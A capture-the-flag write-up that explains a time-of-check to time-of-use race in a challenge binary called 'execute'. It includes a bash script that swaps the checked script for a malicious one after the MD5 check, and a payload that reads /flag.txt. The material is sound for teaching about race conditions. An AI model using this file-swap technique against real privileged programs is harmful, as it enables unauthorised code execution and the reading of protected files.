# Hack the Jail - Part 2

## Difficulty

Hard.

## How To solve

The key insight of this challenge is that the file is opened twice: once for checking whether 
the MD5sum matches the expected value, and the second time for actually executing the file.

This type of vulnerabity is called a "Time-of-check to time-of-use" or in short a TOCTTOU attack.
The challenge contains an artificially long timeout to be able to exploit this vulnerabity more easily.

The script below performs the actual attack:


```bash 
#!/bin/bash

# run the vulnerable program in the backgrouncd
./execute & 
# make sure that the check has been performed
sleep 1
# then replace the program with our malicious program
mv hello_world.sh hello_world.sh.old
cp read.sh hello_world.sh
# wait until the "execute" program has finished.
sleep 8
# clean up
rm hello_world.sh
mv hello_world.sh.old hello_world.sh
```

The contents of the `read.sh` file are as follows:

```
#!/bin/bash 

cat /flag.txt
```

Both files need to have executable permissions which can be obtained using `chmod +x *.sh`.